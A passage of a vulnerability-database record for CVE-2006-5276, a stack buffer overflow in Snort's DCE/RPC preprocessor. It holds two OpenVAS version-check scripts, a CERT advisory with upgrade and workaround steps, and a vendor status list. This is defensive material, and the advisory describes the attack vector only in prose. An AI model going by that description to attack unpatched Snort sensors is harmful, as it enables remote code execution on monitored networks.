Advisory GLSA 200703-01 (snort)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Snort DCE/RPC preprocessor contains a buffer overflow that could result\nin the remote execution of arbitrary code.\";\ntag_solution = \"All Snort users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-analyzer/snort-2.6.1.3'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200703-01\nhttp://bugs.gentoo.org/show_bug.cgi?id=167730\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200703-01.\";\n\n \n\nif(description)\n{\n script_id(58060);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-5276\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200703-01 (snort)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-analyzer/snort\", unaffected: make_list(\"ge 2.6.1.3\"), vulnerable: make_list(\"lt 2.6.1.3\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-5276"], "description": "Check for the Version of snort", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:861388", "href": "http://plugins.openvas.org/nasl.php?oid=861388", "type": "openvas", "title": "Fedora Update for snort FEDORA-2007-2060", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for snort FEDORA-2007-2060\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Snort is a libpcap-based packet sniffer/logger which\n can be used as a lightweight network intrusion detection system.\n It features rules based logging and can perform protocol analysis,\n content searching/matching and can be used to detect a variety of\n attacks and probes, such as buffer overflows, stealth port scans,\n CGI attacks, SMB probes, OS fingerprinting attempts, and much more.\n Snort has a real-time alerting capabilty, with alerts being sent to syslog,\n a separate "alert" file, or as a WinPopup message via Samba's smbclient\n\n Edit /etc/snort.conf to configure snort and use snort.d to start snort\n \n This rpm is different from previous rpms and while it will not clobber\n your current snortd file, you will need to modify it.\n \n There are 9 different packages available\n \n All of them require the base snort rpm. Additionally, you will need\n to chose a binary to install.\n \n /usr/sbin/snort should end up being a symlink to a binary in one of\n the following configurations:\n \n plain plain+flexresp\n mysql mysql+flexresp\n postgresql postgresql+flexresp\n snmp snmp+flexresp\n bloat mysql+postgresql+flexresp+snmp\n \n Please see the documentation in /usr/share/doc/snort-2.7.0.1\n \n There are no rules in this package the license they are released under forbids\n us from repackaging them and redistributing them.\";\n\ntag_affected = \"snort on Fedora 7\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00122.html\");\n script_id(861388);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:01:32 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2007-2060\");\n script_cve_id(\"CVE-2006-5276\");\n script_name( \"Fedora Update for snort FEDORA-2007-2060\");\n\n script_summary(\"Check for the Version of snort\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC7\")\n{\n\n if ((res = isrpmvuln(pkg:\"snort\", rpm:\"snort~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-mysql+flexresp\", rpm:\"snort-mysql+flexresp~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-postgresql+flexresp\", rpm:\"snort-postgresql+flexresp~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-snmp+flexresp\", rpm:\"snort-snmp+flexresp~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-mysql\", rpm:\"snort-mysql~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-snmp\", rpm:\"snort-snmp~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-postgresql\", rpm:\"snort-postgresql~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort\", rpm:\"snort~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-debuginfo\", rpm:\"snort-debuginfo~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-plain+flexresp\", rpm:\"snort-plain+flexresp~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-bloat\", rpm:\"snort-bloat~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-snmp+flexresp\", rpm:\"snort-snmp+flexresp~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-snmp\", rpm:\"snort-snmp~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort\", rpm:\"snort~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-bloat\", rpm:\"snort-bloat~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-postgresql+flexresp\", rpm:\"snort-postgresql+flexresp~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-mysql+flexresp\", rpm:\"snort-mysql+flexresp~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-postgresql\", rpm:\"snort-postgresql~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-plain+flexresp\", rpm:\"snort-plain+flexresp~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-debuginfo\", rpm:\"snort-debuginfo~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"snort-mysql\", rpm:\"snort-mysql~2.7.0.1~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2020-09-18T20:42:51", "bulletinFamily": "info", "cvelist": ["CVE-2006-5276"], "description": "### Overview \n\nA vulnerability in the Sourcefire Snort DCE/RPC preprocessor may allow a remote, unauthenticated attacker to execute arbitrary code.\n\n### Description \n\nSourcefire Snort is a widely-deployed, open-source network intrusion detection system (IDS). Snort and its components are used in other IDS products, notably Sourcefire, and Snort is included with a number of operating system distributions. \n \nSnort preprocessors are modular plugins that extend functionality by operating on packets before the detection engine is run. The [DCE/RPC](<http://www.snort.org/docs/snort_htmanuals/htmanual_261/node104.html>) preprocessor reassembles fragmented SMB and DCE/RPC packets so that Snort rules operate on a complete packet. The preprocessor does not properly reassemble SMB Write AndX commands, creating a stack buffer overflow vulnerability.\n\nThe DCE/RPC preprocessor is enabled by default and dynamically detects SMB traffic. An attacker does not have to complete a full TCP connection to exploit this vulnerability. According to [ISS](<http://www.iss.net/threats/257.html>): \n_This vulnerability is in a dynamic-preprocessor enabled in the default configuration, and the configuration for this preprocessor allows for auto-recognition of SMB traffic to perform reassembly on. No checks are performed to see if the traffic is part of a valid TCP session, and multiple Write AndX requests can be chained in the same TCP segment. As a result, an attacker can exploit this overflow with a single TCP PDU sent across a network monitored by Snort or Sourcefire._ \nNote that this issue affects the following systems:\n\n * Snort 2.6.1, 2.6.1.1, and 2.6.1.2\n * Snort 2.7.0 beta 1\n * Sourcefire Intrusion Sensors versions 4.1.x, 4.5.x, and 4.6.x with SEUs prior to SEU 64\n * Sourcefire Intrusion Sensor Software for Crossbeam versions 4.1.x, 4.5.x and 4.6.x with SEUs prior to SEU 64\nExploit code for this vulnerability is publicly available. \n \n \n \nThis vulnerability occurred as a result of violating rule [ARR33-C](<https://www.securecoding.cert.org/confluence/display/seccode/ARR33-C.+Guarantee+that+copies+are+made+into+storage+of+sufficient+size>) of the CERT Secure Coding Standard. \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code with the privilege level of the Snort preprocessor. In most cases this would allow an attacker to compromise the system running Snort. \n \n--- \n \n### Solution \n\n**Upgrade** \nSourcefire has released Snort [2.6.1.3](<http://www.snort.org/docs/release_notes/release_notes_2613.txt>) which is available from the Snort [download](<http://www.snort.org/dl/>) site. See Snort document [2007-02-19](<http://www.snort.org/docs/advisory-2007-02-19.html>) for more details. Sourcefire customers should see [Sourcefire Support Login](<https://support.sourcefire.com/>) for more details on updates. \n \n--- \n \n**Disable the preprocessor**\n\n \nDisable the DCE/RPC preprocessor (dcerpc) by removing the DCE/RPC preprocessor directives from the configuration file (often `/etc/snort.conf` or `user.conf`). Note that disabling this preprocessor may allow fragmented attacks to evade the Snort sensor. See Sourcefire Advisory [2007-02-19](<http://www.snort.org/docs/advisory-2007-02-19.html>) for more details. \n \n--- \n \n### Vendor Information\n\n196240\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Gentoo Linux __ Affected\n\nNotified: February 19, 2007 Updated: March 12, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to Linux Gentoo Security Advisory [glsa-200703-01](<http://security.gentoo.org/glsa/glsa-200703-01.xml>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23196240 Feedback>).\n\n### Nortel Networks, Inc. __ Affected\n\nNotified: February 19, 2007 Updated: February 21, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [http://www130.nortelnetworks.com/go/main.jsp?cscat=BLTNDETAIL&DocumentOID=540173](<http://www130.nortelnetworks.com/go/main.jsp?cscat=BLTNDETAIL&DocumentOID=540173>)\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23196240 Feedback>).\n\n### Snort __ Affected\n\nNotified: February 17, 2007 Updated: February 19, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to Snort document [2007-02-19](<http://www.snort.org/docs/advisory-2007-02-19.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23196240 Feedback>).\n\n### Sourcefire Affected\n\nNotified: February 17, 2007 Updated: February 19, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Apple Computer, Inc. Not Affected\n\nNotified: February 19, 2007 Updated: February 22, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Cisco Systems, Inc. Not Affected\n\nNotified: February 19, 2007 Updated: February 20, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### F5 Networks, Inc. Not Affected\n\nNotified: February 19, 2007 Updated: February 23, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Force10 Networks, Inc. Not Affected\n\nNotified: February 19, 2007 Updated: March 22, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Foundry Networks, Inc. Not Affected\n\nNotified: February 19, 2007 Updated: January 30, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Intel Corporation Not Affected\n\nNotified: February 19, 2007 Updated: February 20, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Internet Security Systems, Inc. Not Affected\n\nNotified: February 19, 2007 Updated: February 20, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Intoto __ Not Affected\n\nNotified: February 19, 2007 Updated: February 20, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nIntoto products are not vulnerable to the possible exploit documented in this vulnerability note, as they do not use Snort or Sourcefile Intrusion Sensor Software as its component.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Juniper Networks, Inc. __ Not Affected\n\nNotified: February 19, 2007 Updated: February 22, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nJuniper Networks products are not susceptible to this vulnerability.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NetBSD Not Affected\n\nNotified: February 19, 2007 Updated: February 20, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Openwall GNU/*/Linux __ Not Affected\n\nNotified: February 19, 2007 Updated: February 20, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nOpenwall GNU/*/Linux is not vulnerable. We do not package Snort.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Red Hat, Inc. __ Not Affected\n\nNotified: February 19, 2007 Updated: February 21, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nNot vulnerable. Snort is not shipped in any Red Hat product.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### 3com, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### AT&T Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Alcatel Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Avaya, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Avici Systems, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Borderware Technologies Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Charlotte's Web Networks Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Check Point Software Technologies Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Chiaro Networks, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Clavister Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Computer Associates Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Conectiva Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Cray Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### D-Link Systems, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Data Connection, Ltd. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### EMC, Inc. (formerly Data General Corporation) Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Engarde Secure Linux Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ericsson Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Extreme Networks Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fortinet, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### FreeBSD, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fujitsu Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Global Technology Associates Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hewlett-Packard Company Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hitachi Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hyperchip Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation (zseries) Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM eServer Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IP Filter Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Immunix Communications, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ingrian Networks, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Linksys (A division of Cisco Systems) Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Lucent Technologies Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Luminous Networks Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Mandriva, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Microsoft Corporation Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### MontaVista Software, Inc. Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Multinet (owned Process Software Corporation) Unknown\n\nNotified: February 19, 2007 Updated: February 19, 2007 \n\n### 